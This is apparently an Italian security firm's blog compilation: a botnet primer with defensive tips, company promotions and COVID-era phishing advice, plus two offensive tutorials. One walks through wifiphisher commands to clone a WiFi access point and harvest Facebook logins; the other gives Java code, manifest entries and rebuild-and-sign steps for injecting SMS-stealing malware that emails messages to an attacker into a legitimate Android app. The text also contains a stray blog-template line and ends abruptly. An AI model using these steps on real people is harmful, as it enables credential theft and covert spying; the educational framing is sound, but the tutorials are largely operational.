Come difendersi dalle botnet

La parola Botnet deriva da roBOT NETwork. Come già anticipa il termine, si tratta di una  rete formata da dispositivi informatici compromessi (infettati quindi da Malware) e collegati ad Internet, controllati da un unica entità, il botmaster. Una Botnet può avere sia scopi benevoli che malevoli, e può:

  • agire  su una grande rete di computer da remoto;
  • analizzare  automaticamente i dispositivi e le reti ad essi collegati;
  • eseguire attacchi DOS;
  • eseguire  attacchi spam;
  • corrompere altri dispositivi.

Creazione di una Botnet

L’attaccante necessita, prima di tutto, di una macchina compromessa e infettata da utilizzare come zombie. Il Bot  viene programmato per cercare altri dispositivi vulnerabili, infettarli a loro volta e creando cosi una larga rete di target compromessi.

L’attaccante crea  un centro C&C (comanda e controlla) configurando e forzando  i vari host a connettersi e ad aspettare istruzioni. Tramite quel centro è ora possibile comandarli contemporaneamente, lanciare attacchi DDoS (Distributed Denial of Service)  o infettare altri dispositivi.

Principali tipologie di botnet:

  • Centralizzate: sono comandate da un unico C&C, il quale impartisce i comandi e le controlla in modo totale. Se il botmaster viene però rintracciato e reso innocuo, esse non svolgeranno più la loro funzione;
  • Decentralizzate (tramite p2p): sono collegate tra di loro come una rete di pari ed ognuna impartisce ordini ai nodi vicini. In questo modo, anche nel caso in cui ne venga fermata una, le altre continuano a compiere comunque il loro lavoro.

Il modo più semplice per controllare una botnet è quello di connettere ogni bot a un server remoto. In tal caso una singola sorgente di controllo potrebbe inviare comandi e aggiornamenti con metodi di comunicazione sincroni oppure asincroni, che si differenziano nel modo che segue:

  • Asincrono: basato su HTTP, prevede una connessione verso un server Web per caricare/eseguire istruzioni a intervalli predefiniti;
  • Sincrono: basato su IRC (Internet Relay Chat), consiste nell’instaurare un canale persistente (chat) tra i bot e il server IRC per ricevere i comandi in real time.

La centralità di queste configurazioni li rende, però, particolarmente vulnerabili. Infatti per annientare la funzionalità dell’intera botnet basterebbe semplicemente individuare e oscurare il server C2 (HTTP/IRC).

Le scelte degli hacker

Gli hacker si trovano quindi di fronte a diverse scelte:

  • La possibilità di implementare una modalità di comunicazione distribuita peer-to-peer (P2P). In questo scenario, in cui un dispositivo zombie può fungere sia da bot e che da server C2, non esiste alcun punto di riferimento da cui i bot ottengono le proprie istruzioni.  Quest’ultima configurazione, anche se meno diffusa a causa della complessità realizzativa, risulterebbe meno vulnerabile ad un eventuale contrattacco. Sarebbe più problematico oscurare tutti i bot per annientare la funzionalità dell’intera botnet;
  • La possibilità di implementare una modalità di comunicazione mista. Una buona soluzione potrebbe essere quella di adottare una configurazione cercando di cogliere tutti i vantaggi delle modalità di controllo centralizzato/P2P. Ad esempio, creando una botnet P2P per comunicare con i server C2 tramite protocollo HTTP;
  • La possibilità di implementare una modalità di comunicazione utilizzando la rete TOR. Questa rete, come noto, essendo crittografata e progettata per essere anonima consentirebbe di nascondere le azioni botnet. Fine modulo

Obiettivo delle Botnet:

Consentire l’azione simultanea di centinaia di migliaia di dispositivi  che potrebbero essere utilizzate dai botmaster con diversi scopi:

  • per eseguire attacchi DDoS (Distributed Denial of Service) su server Web, bersagliando con traffico anomalo un sito Web, allo scopo di sovraccaricare i servizi bloccandone il funzionamento;
  • per lo spamming. Le botnet infatti risultano essere i principali mezzi impiegati allo scopo;
  • per frodi web. La simulazione di clic su link pubblicitari o il caricamento in background di siti Web (magari estranei a queste attività), potrebbero essere fonte di profitti fraudolenti, qualora questi siti pagassero in base al numero di click o di visualizzazioni;
  • per minare Bitcoin, sfruttando la potenza di calcolo dei computer zombie;
  • per distribuire altri malware. Come visto, le infezioni botnet si diffondono attraverso malware/Trojan che, individuando le vulnerabilità di sistemi firewall o antivirus obsoleti (o non aggiornati), scaricano altri software malevoli (adware, spyware, ransomware etc.) per una vasta gamma di impieghi illeciti e data breach;
  • per noleggiare MaaS (https://maas.io/ ) e/o ulteriori servizi malevoli a pagamento.

Esistono diversi software per la creazione di queste reti. Ricordando che l’utilizzo per fini illeciti è perseguibile penalmente,  alcuni tra i più conosciuti sono:

  • Botnet Trojan Shark: è un software per il controllo di macchine Windows, bypassa certi firewall, tutto il traffico inviato è criptato e ha anche funzionalità di keylogging;
  • Poison Ivy: come sopra, potete trovare il link per il download e un laboratorio pratico a questo indirizzo.
  • PlugBot: è una Botnet Hardware, creato per un progetto di ricerca. Sito ufficiale.
  • Illusion Bot;
  • Netbot attacker.
  • Malware PBot


Un esempio pratico: Il malware DDoS PBot, utilizzato per lanciare gli attacchi DDoS più imponenti registrati da Akamai nel secondo trimestre del 2017. Nel caso del malware PBot, utenti malintenzionati hanno utilizzato codice PHP che risale ad alcuni decenni or sono per generare un imponente attacco DDoS. Gli autori degli attacchi sono riusciti a creare una mini botnet DDoS in grado di lanciare un attacco DDoS da 75 gigabit al secondo (Gbps). È interessante notare che la botnet PBot era composta da un numero relativamente contenuto di nodi, circa 400, in grado tuttavia di generare un notevole livello di traffico di attacco.

Il contrasto e l’analisi internazionale

 Le Botnet sono uno principali rischi per la sicurezza in questi ultimi anni, poichè riescono a dare una potenza di calcolo e di banda a persone con fini non propriamente legali. Rilevarle e metterle offline richiede una quantità di tempo ed energie spropositate, in quanto trovare una macchina infettata non implica necessariamente riuscire a risalire al botmaster (specialmete se  controllata da TOR, ad esempio).

Dida figura: Traffico di Dridex

Un team di sicurezza informatica è riuscito ad analizzare in buona parte la botnet Dridex e il traffico che essa genera (è tutt’ora attiva). Questa si propaga tramite allegati mail (mai aprirli senza prima averli analizzati), e si auto-invia ai contatti presenti nella rubrica della vittima. L’analisi, in inglese, è possibile trovarla a questo indirizzo (di particolare interesse anche il video ). Un altro aspetto da considerare e analizzare consiste nelle attività maligne rilevate nel mese scorso in tutto il mondo, organizzati in un video che si può scaricare o vedere direttamente da qui.

Recentemente ha fatto scalpore la notizia a proposito della sparizione della Botnet più grande del mondo. Questa infatti è svanita, semplicemente scomparsa senza lasciar traccia di sè. Era già era stata distrutta nell’ottobre 2015, da una task force di NCA e FBI, ma in qualche modo era resuscitata e tornata al “lavoro”, diffondendo il ransomware Locky. Altri dettagli si possono trovare su securityaffairs e vice.

Come difendersi dalle botnet

La  difesa contro questa minaccia in continua evoluzione è quella di proteggere la rete e i potenziali accessi, ossia gli utenti (che andrebbero adeguatamente educati sulla minaccia e sulla sua gestione).

Un ruolo fondamentale viene giocato dal fattore umano e da tutti quegli aspetti legati alle disattenzioni degli utenti nel rispettare delle buone regole di sicurezza. 

È sufficiente infatti una mail infetta, il download di un programma non controllato o un exlpoit che sfrutta falle di sicurezza per far diventare un apparato (PC, dispositivo mobile, sistema IoT) uno zombie. Ecco quindi alcuni consigli di sicurezza minima per gli utenti da tenere sempre presenti:

  • aggiornare il proprio dispositivo con le ultime versioni di sistema operativo e/o firmware;
  • proteggere il proprio dispositivo con applicazioni antivirus e firewall aggiornati;
  • scaricare software/app attendibile e verificato ed aggiornarlo periodicamente;
  • prestare attenzione ad allegati e link presenti nei messaggi di posta elettronica.

Difesa per le aziende – Come ridurre l’esposizione al rischio botnet

La difesa passa sicuramente attraverso l’educazione digitale degli utenti, ma è anche vero che le stesse aziende possono mettere a punto alcune accortezze per difendersi. In particolare, alcuni accorgimenti base sono:

  • Utilizzare strumenti per interrompere il flusso di e-mail indesiderate e ad alto rischio di contenere allegati malevoli;
  • prevedere strumenti per filtrare i contenuti in uscita dalla rete aziendale, gli accessi e limitare l’esposizione alle minacce, in modo da scongiurare eventuali interazioni tra un malware bot insediatosi e il suo server C2;
  • contrastare l’eventuale diffusione laterale dell’infezione, all’interno della rete, tramite l’attuazione di restrizioni sulle relazioni trust dei domini e sugli account locali amministrativi;
  • intensificare il rilevamento di attività insolite attraverso un perfezionamento del monitoring della rete e delle connessioni;
  • offrire formazione e aggiornamenti frequenti ai dipendenti sulle regole di supporto alla sicurezza di rete sulle minacce informatiche e le eventuali truffe perpetrate tramite phishing o altre tecniche.

Attacco ad una rete pubblica WiFi

Chissà quante volte ci è capitato di vedere – presso esercizi commerciali, locali o parchi pubblici – cartelli che segnalano la presenza di reti WiFi gratuite o accessibili attraverso un semplice “like” su Facebook. Con buona probabilità, ognuno di noi ha utilizzato tali servizi almeno una volta, vuoi per necessità o semplicemente per quella che oggigiorno è una naturale attitudine a rimanere connessi a internet.

Come mai allora queste reti non godono di una buona reputazione? E in che modo vengono sfruttate da utenti malintenzionati? Nel prosieguo dell’articolo analizzeremo e creeremo un tipico potenziale scenario con lo scopo di intercettare le informazioni sensibili inserite dall’ignaro utente. In poche parole, la classica combinazione username/password.

Dal momento che le possibilità di intercettare traffico e dati interessanti in chiaro – dunque non crittografati dal ben noto protocollo HTTPS – mediante sniffer di rete (come wiresharkxplicoferret) sono piuttosto scarse per via delle policy sempre più stringenti in fatto di sicurezza adottate da browser e sistemi operativi, ci industrieremo in un ben più efficace tentativo di phishing: d’altra parte è risaputo, l’anello debole di un sistema informatico si trova sempre davanti allo schermo!

Ancora una volta, precisiamo che effettuare le pratiche mostrate qui di seguito al di fuori di ambienti simulati o nei confronti di soggetti non consenzienti, può significare incorrere nelle prescrizioni di cui agli articoli 616615-ter615-quater617-sexies640-ter del nostro Codice Penale.

Cominciamo configurando sulla nostra distribuzione Linux uno dei framework più famosi nell’ambito degli attacchi wireless, ovvero il progetto wifiphisher:

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

Troviamo lo strumento già preinstallato in WifiSlax, un ottimo sistema operativo di origini catalane dedicato proprio al pentesting di applicazioni WiFi. Dobbiamo poi munire il nostro sistema (anche come macchina virtuale) di almeno una seconda scheda di rete WiFi che consenta l’iniezione di pacchetti e il monitor mode. Se stiamo utilizzando VirtualBox come piattaforma di virtualizzazione, ci basterà cliccare sull’apposito menù e spuntare il device:

Lanciamo il programma nel suo utilizzo base con il comando:

sudo wifiphisher

Una prima modalità prevede la possibilità di clonare un Access point – e creare il cosiddetto Evil twin – inviando pacchetti di modo da deautenticare tutti i client connessi in quel momento per poi forzarli a riconnettersi all’AP creato dal nostro script. Dopo aver modificato l’indirizzo MAC della scheda di rete attaccante per garantirci un minimo di anonimato, selezioniamo la rete target da clonare tra quelle proposte nel menù:

Vengono messi a disposizione quattro possibili scenari con cui adescare il client vittima; nella fattispecie, selezioniamo il numero 4 – OAuth login Page:

Un aspetto interessante di questa modalità di attacco, è che il tutto avviene in maniera automatica e piuttosto sbrigativa: la vittima vedrà apparire una finestra del proprio browser – sia desktop che mobile – la quale richiede l’inserimento di credenziali per poter proseguire nella navigazione (in questo caso quelle di Facebook):

Ed ecco come il terminale del programma ci restituirà indirizzo mail e password della vittima:

Se volessimo essere ancor più diabolici e aumentare le probabilità di successo, potremmo modificare a nostro piacimento i tag HTML della pagina web, magari inserendo un titolo più accattivante e in lingua italiana oppure rendere ancora più credibile l’URL generato dal server web. Troviamo le cartelle delle pagine HTML del server al percorso:

wifiphisher/data/phishing-pages

Una seconda modalità molto efficace del framework, prevede invece la creazione ex novo di un hotspot WiFi aperto da lasciare attivo in attesa di un malcapitato utente alla ricerca di una connessione internet. La community di wifiphisher, inoltre, si è adoperata per ampliare il numero di scenari di quest’ultima tipologia di attacco, mettendo a disposizione il seguente materiale:

https://github.com/wifiphisher/extra-phishing-pages

Copiamo le cartelle scaricate al percorso indicato poc’anzi e rilanciamo lo script iniziale di installazione per avere anche questi add-on operativi. Eseguiamo dunque il programma con la seguente sintassi, specificando il nome della rete da usare come trappola e quello della pagina web dello scenario desiderato (parametro -p):

sudo wifiphisher --noextensions --essid "FREE WIFI ICT SECURITY MAGAZINE" -p oauth-login -kB
 La vittima rileverà dal proprio device una nuova rete: come è possibile vedere dagli screenshot successivi, la finta maschera di login appare in primo piano anche con dispositivi Android:

Dopo aver visto ciò che può mettere in atto un potenziale attaccante, ci chiediamo quello che possiamo fare da internauti consapevoli per non incappare in brutte sorprese. Il mondo del software in questo caso ci dà solo parzialmente una mano: è possibile che qualche antivirus metta genericamente in allerta della pericolosità di una nuova rete rilevata ma di certo non fermerà l’utente in fase di inserimento delle credenziali. Nemmeno una VPN ci mette al riparo dalla malevola intercettazione: l’incapsulamento del traffico internet avverrà solo successivamente alla connessione all’Access point, e dunque quando avremmo già inserito i nostri preziosi dati.

É invece sicuramente utile tenere aggiornati i propri browser e prestare attenzione alla compilazione automatica che spesso propongono innanzi a nuovi form: URL e pop-up vari devono essere sempre esaminati con la dovuta perizia, premendo invio solo quando siamo certi di inviare i nostri dati al legittimo destinatario. Infine, per i siti più sensibili è consigliabile implementare il meccanismo di doppia autenticazione tramite SMS o token monouso a sei cifre generato da applicazioni per smartphone.

Ethical Hacking: Android: inserire un malware in un APK

Per la serie “conoscerli per combatterli”, vedremo in questo articolo come iniettare del malware in un’applicazione Android. A fine 2017, il solo Grabos, codice maligno presente in oltre 150 app su Play Store, ha infettato più di 17 milioni di utenti Android (fonte: mcafee.com)e non si tratta né del primo né dell’unico malware presente su Play Store nascosto all’interno di applicazioni insospettabili (Figura 1, fonte: av-test.org).

Figura 1

È quindi evidente come si tratti di una minaccia molto comune. Per eseguire un’analisi di un’applicazione infetta bisogna innanzitutto capire come agiscono gli attaccanti: di seguito vedremo in dettaglio come una normale applicazione mobile possa essere alterata inserendo del codice ostile.

Disassemblare un’applicazione

Cosa bisogna fare per trasformare una applicazione lecita in una applicazione malware? Per prima cosa è necessario scegliere una app da infettare. Per scaricare l’applicazione, se non abbiamo un dispositivo Android a portata di mano, è possibile utilizzare un servizio come APK Downloader (https://apps.evozi.com/apk-downloader/) o simili.

Al fine di comprendere il funzionamento una semplice app è sufficiente, ma in generale, quando il target non è obbligato, è preferibile infettare un’applicazione che già richiede i permessi necessari al malware per non insospettire l’utente.

Dopo averla scaricata, bisogna disassemblare l’applicazione, in modo da poterla modificare a piacimento. Per svolgere il procedimento utilizziamo Apktool (vedi Riquadro 1) ottenendo i file in Figura 2 (in figura è mostrato l’output di APK Tool utilizzato attraverso APK Studio).

Figura 2

Tra i file prodotti, quelli che ci interessano sono contenuti nella directory smali/,  la quale include tutti i file dell’applicazione scritti in Smali, dove Smali è un linguaggio basato su Jasmin che disassembla un file .dex in un formato più leggibile.

I file .smali rispecchiano il comportamento dell’applicazione d’origine ma presentano un difetto, ovvero che non essendo lo Smali un linguaggio di alto livello, risulta non immediatamente leggibile.

Se invece vogliamo capire per grandi linee come l’app è fatta e come si comporta, ci è più utile uno strumento come dex2jar che trasforma un file .dex in un archivio JAR (Figura 3).

Figura 3

Archivio JAR che può essere analizzato con un semplice decompilatore Java come JD-GUI. I file .class prodotti sono in genere meno affidabili di quelli .smali e, inoltre, con questa operazione, non è possibile la ricostruzione dell’APK.

 

Riquadro 1: Apktool

Apktool è uno strumento per effettuare il reverse engineering dei file binari di Android. In concreto permette di disassemblare l’app e, cosa ancor più importante, permette di ricostruire il file APK dopo aver apportato eventuali modifiche.

I comandi principali sono 

  • apktool d <nome apk> per disassemblare
  •  apktool b <nome directory> per ricostruire l’APK.

Oltre alla directory smali, che ci interessa particolarmente quando disassembliamo un file, abbiamo anche le directory original e unknown:

  • original contiene la cartella META-INF e il file xml che servono quando vogliamo ricostruire l’app mantenendo la firma originale;
  • unknown contiene i file e le cartelle che non sono parte di AOSP (Android Open Source Project).

 

Preparare il malware

Dopo aver disassemblato l’applicazione originaria, il passo successivo consiste nella scrittura dell’applicazione malware in Java con Android Studio. Per semplicità, creiamo un malware molto elementare, andiamo sul “classico”: in questo esempio scriveremo un’applicazione che legge gli SMS e li inoltra via email ad un indirizzo scelto dall’attaccante.

Se l’applicazione malware ha bisogno di permessi aggiuntivi rispetto all’applicazione ospite, questi vanno richiesti nel manifesto; nelle ultime versioni di Android vanno anche controllati, ed eventualmente richiesti, a runtime rispettivamente con ContextCompat.checkSelfPermission() e ContextCompat.requestPermissions() (a questo proposito si veda https://developer.android.com/training/permissions/requesting.html per maggiori dettagli).

Il malware per inviare un’email non usa un Intent né fa scegliere all’utente quale client usare, ma fa tutto in background utilizzando il server di posta di GMail (smtp.gmail.com). Quello che ci serve quindi è una classe che eredita da BroadcastReceiver e che non fa altro che rimanere in ascolto dell’arrivo di un SMS. All’arrivo di un messaggio ne estrae il mittente (msg_from) e il contenuto (msg_body) e invia una email:

Log.i(“SMS2EmailReceiver”, “Start email”);
String email = “
xxx@gmail.com”;
String subject = “Email from SMS”;
String message = sms_from + “: ” + sms_body;
SendMail email = new SendMail(email, subject, message);
email.execute();
Toast.makeText(context, message, Toast.LENGTH_LONG).show();
Log.i(“SMS2EmailReceiver”, “Finish email”);

Dove SendMail è una classe che si occupa di inviare le email ed usa internamente le API di JavaMail (javax.mail.*). Nel manifesto invece va specificato il receiver e l’azione ad esso associata nel seguente modo:

<receiver android:name=”.SMS2Email”>
<intent-filter>
<action android:name=”android.provider.Telephony.SMS_RECEIVED”/>
</intent-filter>
</receiver>

A questo punto costruiamo l’APK con Android Studio e proviamola sull’emulatore: se tutto funziona come previsto, disassembliamo l’applicazione appena creata, in modo da avere del codice Smali per il nostro malware da iniettare.

Iniettare il codice e ricostruire l’applicazione

Trasformiamo ora l’applicazione lecita in una applicazione malware. Per farlo, basta copiare il contenuto della directory smali/ (tranne android/) del codice del malware nella directory smali/ dell’applicazione ospite; faremo lo stesso per i file presenti in unknown/.

Dopo aver inserito il codice necessario, possiamo ricreare l’applicazione.

Per poterla installare ci occorre firmarla: è possibile usare Uber APK Signer da riga di comando o attraverso APK Studio; alternativamente possiamo utilizzare direttamente APK Signer e Zip Align.

Usiamo APK Studio per costruire (con APK Tool), firmare (con Uber APK Signer) e ottimizzare (con Zip Align) l’applicazione che adesso è pronta per essere installata o, eventualmente, per essere caricata su Play Store.

Installare e testare l’applicazione

Figura 4

Anche in questo caso l’installazione può avvenire attraverso un tool grafico come Apk Studio o direttamente con il comando install di ADB.

Ricapitolando, per aggiungere del codice ostile ad una app ci serve:

  • Disassemblare l’app ospite con APK Tool
  • Scrivere il malware con Android Studio
  • Costruire l’APK malware con Android Studio
  • Disassemblare il malware con APK Tool
  • Copiare la directory smali/ del malware in quella dell’app ospite
  • Costruire, firmare e ottimizzare l’app ottenuta con APK Studio
  • Installare l’app con ADB

Sembrano molti passi ma, anche se macchinosi, sono tutti molto semplici e immediati. Eseguiamo normalmente l’applicazione, che continuerà a fare il suo lavoro, ma al primo SMS ricevuto ecco scattare il comportamento da malware: invierà un’email e nel corpo ci sarà indicato il mittente e il testo del messaggio.

Lo sviluppatore java: una figura sempre più richiesta che offre ai giovani grandi opportunità

Una delle professioni centrali nel mondo dell’informatica è lo sviluppatore Java. Si tratta infatti di una figura estremamente richiesta, poiché il linguaggio Java, che domina il 4% del mercato mondiale. Secondo linguaggio di programmazione informatica in ambito aziendale più utilizzato da multinazionali e aziende, soprattutto del settore dell’e-commerce e del banking, viene prediletto, nonostante sia difficile da gestire e apprendere, soprattutto per la sua robustezza e quindi per la capacità di sopportare una utenza numerosa.

Decidere di investire in una carriera nella programmazione Java infatti permette di intraprendere strade diverse, inserendosi in molti settori del mercato nazionale ed internazionale, dalla sicurezza al banking, dal mondo dei videogames fino a quello delle applicazioni mobile, e molti altri ancora.

IL PROGRAMMATORE JAVA E IL PERFEZIONAMENTO DI TECNINF

Il lavoro di un programmatore Java si sviluppa a diversi livelli

  • front-end developer ovvero colui che si occupa dell’interfaccia utente, in parole povere quella parte del sito web con cui l’utente interagisce;
  • back-end developer indica invece uno sviluppatore che crea le fondamenta di un sito, quella parte che l’utente finale non vedrà mai ma che è alla base della sua esperienza di navigazione;
  • full-stack developer è invece la figura di programmatore più completa, poiché possiede conoscenze e competenze sia per il lato front end che back end.

Si tratta di una professione difficile ma piena di stimoli: è necessario avere un approccio analitico, preciso, scrupoloso e avere capacità di problem solving. Con il nostro corso di perfezionamento, Tecninf si concentra sul full-stack developer, andando ad affinare e perfezionare competenze già in possesso dei partecipanti, in modo da offrire una preparazione completa ed approfondita.

Lavorando con i nostri progetti infatti lo sviluppatore Java si troverà a dover fare fronte a siti web, applicativi e database con grandi bacini di utenza, e dovrà quindi condurre test, attività di debug per correggere malfunzionamenti, intervenire su codici sviluppati da altri.  

Come cominciare? Quali i percorsi formativi da intraprendere per rispondere alle esigenze del mercato? Sicuramente una laurea in informatica è un ottimo punto di partenza ma, come in tutte le professioni, non si smette mai di imparare. E soprattutto, è fondamentale l’esperienza “sul campo”.

Noi di Tecninf offriamo gratuitamente percorsi di formazione che, nel caso di candidati validi e idonei, si tradurrà in un percorso di assunzione. I nostri corsi permettono ai partecipanti di maturare un’esperienza “on the job” all’interno dei team aziendali. Per accedere è necessario avere conoscenza della logica di programmazione, basi di JAVA, Database (sql) ed essere in possesso di un Diploma o una Laurea in discipline ad indirizzo Informatico

COSA FACCIAMO NEI CORSI TECNINF

I candidati sono supportati da tutor specializzati che li aiuteranno a partecipare alla progettazione, analisi e sviluppo del codice con metodologie e framework tra i più diffusi. All’interno del corso vengono strutturate sessioni di “proget work”, che simulano integralmente un progetto e tutto il ciclo di vita di un software trattando argomenti, tecnologie e metodologie di ambienti lavorativi. Qualche esempio? Tra le skills che i nostri candidati acquisiscono ci sono:

  • analisi e raccolta requisiti
  • programmazione front end e back end
  • fase di test e bug fixing
  • UAT
  • deploy

Attività che vengono accompagnate dallo studio, approfondimento e applicazione del linguaggio Java Base e Avanzato e Web, su Hibernate, Spring, Angular e progettazione e modellazione Database.

Al termine del percorso i partecipanti che avranno dimostrato volontà nell’apprendimento, serietà e passione potranno godere di un’ulteriore opportunità: quella di essere inseriti in importanti progetti aziendali con contratto lavorativo.

Tecninf e Standoff: la cyberbattle in una città virtuale per mettere in pratica le best practice apre le porte al pubblico

Tecninf quest’anno prende parte alla grande competizione internazionale The Standoff, una piattaforma cyber range realizzata dai migliori professionisti del mondo IT e della cybersecurity.

Si tratta di una battaglia cibernetica durante la quale diverse aziende di cybersicurezza ricevono il compito di proteggere attività commerciali che imitano società reali di vario genere dagli attacchi informatici provenienti da tutto il mondo. “City F” viene descritto dagli organizzatori dell’evento come un “gemello digitale di un agglomerato moderno” dove ogni oggetto “ha i propri sistemi IT che utilizzano esattamente le stesse applicazioni web, software, hardware, PLC e SCADA delle loro controparti nella vita reale”. 17 gli obiettivi aziendali tra banche, aeroporti, centrali elettriche, sistemi di trasporto e molto altro: tutti sistemi collegati in un sofisticato ecosistema che deve far fronte a 45 rischi critici su scala aziendale.

Una vera e propria simulazione in tempo reale di ciò che accade quotidianamente nel mondo della sicurezza informatica, a partire da minacce che simulano in tutto e per tutto quelle del mondo reale, scoprendo nuovi vettori e tecniche di attacco su ICS e SCADA. The Standoff quindi promuove il nuovo paradigma di sicurezza secondo il quale i sistemi di sicurezza informatica dovrebbero avere KPI collegati al business.

Per contrastare gli attacchi di 30 squadre white hat, che impersonano le minacce e gli attacchi ai sistemi informatici, sono state selezionate 5 squadre blu di difesa: Tecninf è tra queste. Un’occasione importante non solo per far conoscere il mondo della sicurezza informatica, ma anche per mostrare competenze, Skills e il know-how che rende Tecninf un leader del settore.

Fino al 17 novembre, Tecninf sarà onorata di accompagnare gli utenti e i clienti dietro le quinte della sicurezza informatica.

All’interno dell’evento infatti è possibile partecipare ad un virtual tour di 1 ora dove un esperto mostrerà i meccanismi alla base della sicurezza informatica: la risposta in tempo reale agli attacchi informatici, il controllo dei processi in funzione, il monitoraggio informatico e molto altro ancora, per conoscere e comprendere al meglio le best practice di sicurezza informatica che hanno reso Tecninf leader di settore nell’era del mondo interconnesso.

Per partecipare al virtual guided tour, basta registrarsi qui ( https://ptsecurity-6477774.hs-sites.com/the-standoff-guided-tour) e accedere agli slot selezionati o richiedere un tour privato on demand.

Intervista Cao Pinna a Isoradio

Ascolta l’intervento del Responsabile Servizi Speciali Tecninf, Roberto Cao Pinna a Rai Isoradio durante la trasmissione radiofonica di Alessandra Montico “Da domani si riparte”.   Molti interessanti i due temi toccati da Cao Pinna: dai rischi e gli attacchi informatici legati allo smart working all’utilizzo di nuove tecnologie in realtà aumentata per monitorare la ripresa post pandemia.

Smart working fra nuovi rischi e nuova sicurezza da remoto

In una situazione come quella che stiamo vivendo, la possibilità di lavorare da remoto, lo smart working, rappresenta una grande risorsa per aziende, Pubbliche Amministrazioni e tutte le realtà che possono metterlo in atto. Tuttavia, pur rappresentando grandi vantaggi, lo smart working può nascondere nuovi, inesplorati rischi: lo spiega il dott. Roberto Cao Pinna, Responsabile Servizi Speciali Tecninf, azienda leader in cyber security e applicazioni di Artificial Intelligence.  

Il client che si connette tramite connessione sicura alla rete aziendale, lo fa da una rete che non può essere considerata trusted. È una vulnerabilità che si riflette anche nel dispositivo utilizzato, in quanto le contromisure per i client corporate attestati sulla rete aziendale non possono essere implementate attraverso una rete remota: questo significa che non possono essere garantite quando il client non è connesso attraverso l’uso della VPN. 

Proviamo a fare un esempio. Il dipendente Mario Rossi (nome di fantasia, non ce ne vogliano tutti i reali “Mario Rossi”) utilizza il portatile fornito dall’azienda per lavorare in smart working, accedendo alle risorse aziendali tramite la VPN. 

Quando non lavora, il signor Rossi utilizza lo stesso computer per svago, navigare sui social, leggere la posta privata, tutte operazioni che in ambito aziendale potrebbero essere quantomeno filtrate e analizzate dalla rete stessa. In un contesto familiare, inoltre, anche i parenti o i figli del signor Rossi potrebbero moltiplicare involontariamente il rischio accedendo, ad esempio, a piattaforme di didattica online non trusted, inviando e ricevendo file e partecipando a video-lezioni tramite utenze riportanti il dominio scolastico.  

Purtroppo, nell’utilizzo privato, il portatile viene infettato da un malware o, peggio ancora, un potenziale attaccante riesce a “prenderne possesso”, ovvero ad utilizzarlo per i suoi scopi senza che il signor Rossi se ne accorga. Il problema maggiore, dal punto di vista aziendale, si ha nel momento in cui il dipendente si connette in VPN con il portatile: da quel momento in poi il malware o, l’attaccante, vengono proiettati all’interno della rete aziendale con possibilità di diffusione su altri sistemi attraverso l’utilizzo di tecniche più o meno avanzate. 

“Questo scenario, assolutamente verosimile – dice Cao Pinna – impone alle aziende la necessità di andare oltre la semplice difesa perimetrale, dotandosi di strumenti che consentano il monitoraggio continuo di ciò che accade nella rete per verificare eventuali azioni di hacking. 

“Tecninf – prosegue Cao Pinna – in questo senso, ha già attivato una rete di esperti che si occupano di analisi e test dei protocolli aziendali, per permettere a tutte le realtà che utilizzano una rete VPN di schermare qualsiasi tipo di minacce. Nel mondo di internet, sperare che non accada nulla non è mai una strategia vincente. Le contromisure devono essere prima di tutto efficaci, oltre che molteplici, pensate da professionisti che quotidianamente studiano le tecniche dei cyber criminali e la loro “forma mentis”, ovvero il pensiero dietro il tentativo di scardinare difese spesso imponenti che all’apparenza sembrano impenetrabili ma che a un’attenta analisi presentano, spesso, delle criticità”.  

post. Edit or delete it, then start writing!

Account takeover, il criminal hacker al tempo del Coronavirus

La disinformazione ai tempi del Covid-19 viaggia sul web, sui social e sulle chat telefoniche per questo Tecninf Spa azienda leader del settore ha formulato un protocollo in difesa del consumatore informatico. A seguito dell’attività di osservazione sui i flussi di comunicazione digitale come la Posta la Telefonia e il flusso di comunicazione Internet si rileva un’intensa attività di gruppi “Criminal Hacker” che sono noti per prosperare in tempo di crisi e l’attuale pandemia COVID- 19 non fa eccezione. 

Ciò che ha reso questa emergenza diversa dagli eventi precedenti è l’impatto immediato e rapido che ha avuto sull’economia Cyber Crime, con i criminali informatici che non hanno lasciato nulla di intentato.  

Stiamo assistendo a una crescente ondata di tentativi di attacco di seguito i più diffuse:  

Account Takeover  

L’account takeover è un attacco in cui i criminali informatici sfruttano le credenziali rubate nel corso di Data Breach per prendere il controllo di account come on-line banking e simili. Ora, in maniera più preoccupante, sapendo che i bambini di tutto il mondo non vanno a scuola, i truffatori si rivolgono direttamente a loro nella speranza di accedere ai loro account, specialmente nel mondo gaming. Questi, infatti, sono spesso collegati alle carte di credito dei genitori. Informare i soggetti target (ragazzi – bambini) della possibilità di essere soggetti di messaggi falsi con scopo di adescamento.  

Una volta rilevato il messaggio informare la Polizia Postale.  

https://www.commissariatodips.it/

https://www.google.com/intl/it/contact/

https://support.apple.com/it-it/HT201303

http://www.protezionecivile.gov.it/media-comunicazione/news/dettaglio/- /asset_publisher/default/content/emergenza-coronavirus-attivato-il-conto-corrente-per-le-donazioniPhishing  

Vishing  

Cosa hanno in comune i conti bancari online e COVID-19? Non molto, a meno che non siate un Criminal Hacker come quello che ha inviato ai clienti di una banca un’e-mail che consigliava loro di chiamare la sede per risolvere un mancato pagamento. Si trattava di un tipico stratagemma, tranne per il fatto che includeva anche la frase “Se la vostra situazione finanziaria è stata influenzata da COVID-19, chiamateci per discutere le opzioni…”. 

L’e-mail ha poi fornito un numero di telefono VoIP da chiamare al posto di un link da cliccare. Mentre gli attacchi di vishing comportano la ricezione di una telefonata VoIP non richiesta da parte di qualcuno che sembra rappresentare una banca o un’altra organizzazione, questo nuovo tipo di attacco, soprannominato “reverse vishing”, utilizza e-mail, annunci online o post sui social media per convincere le potenziali vittime a chiamare un numero di telefono controllato dal truffatore.  

Soluzione Tecnica Consultare i siti ufficiali dei soggetti coinvolti , chiedere sempre i nominativi dei soggetti che vi contatteranno, consultare telefonicamente le forze dell’ordine.  

Dotarsi delleAPP IOS e Android anti Phishing  

https://it.safetydetectives.com/blog/i-migliori-antivirus-veramente-gratuiti-per-android/

https://www.google.com/intl/it/contact/

https://support.apple.com/it-it/HT201303

https://www.commissariatodips.it/

Consultare i siti ufficiali dei soggetti coinvolti, o citati nei link del testo dell SMS.  

Dotarsi delle APP- IOS e Android anti Phishing  

https://it.safetydetectives.com/blog/i-migliori-antivirus-veramente-gratuiti-per-android/

https://apps.apple.com/us/app/anti-phishing-identity-guard/id1136376302

Smishing  

